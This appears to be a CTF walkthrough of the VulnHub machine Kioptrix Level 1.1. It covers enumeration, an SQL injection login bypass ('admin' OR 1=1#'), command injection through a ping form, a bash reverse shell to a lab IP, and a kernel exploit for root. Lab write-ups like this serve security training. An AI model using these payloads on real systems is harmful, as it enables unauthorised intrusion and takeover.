CTF Walkthroughs, VulnHub

VulnHub – Kioptrix: Level 1.1 Walkthrough

March 30, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Linux machine that involved exploiting an SQL injection to authenticate into a web application, exploiting a remote command execution vulnerability to gain remote access and using a kernel exploit to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -oA to save the output in all formats available

Enumerating HTTP

Upon accessing the web server through a browser, the below login page is displayed:

After trying a few common and/or default credentials to authenticate to no avail, decided to run a Nikto scan to gain more information about the target and any possible exploitation routes:

The scan did not identify anything useful sadly. The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

Exploiting SQL Injection and Remote Command Execution

It turns out the authentication can be bypassed by using the following payload in the username field:

admin' OR 1=1#

This means the query used to perform the authentication will look like the following:

SELECT * FROM users WHERE username = admin' or 1=1--

since 1=1 is always true, the query will allow login to the web application. Commented the rest of the query just in case.

This takes to a page that allows to ping other machines by entering the IP address:

By adding a semicolon, this interrupts the ping command and allows to inject arbitrary commands:

As shown below, the command was run and the output of the command is displayed on the web page:

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Using a BASH reverse shell to connect to the listener:

bash -i >& /dev/tcp/192.168.181.131/1234 0>&1

A callback was received, granting a shell as the apache user:

Privilege Escalation

When enumerating the operating system and kernel, it appears the machine is running Linux 2.6.9-55

Using SearchSploit to look for known vulnerabilities in this version of the Linux kernel:

Mirroring the exploit onto the Kali host:

Transferring the exploit to the target machine using the Python web server and Wget:

Compiling the exploit using GCC, allocating execute permissions to it and executing it:

This has granted a root-level shell with full access to the machine.

Conclusion

Although this machine was quite an easy challenge it had some interesting elements such as the SQL injection (although it would have been more interesting if the vector was a little less common) and the remote command execution vulnerability which is quite common when web applications attempt to execute BASH commands through web pages or scripts.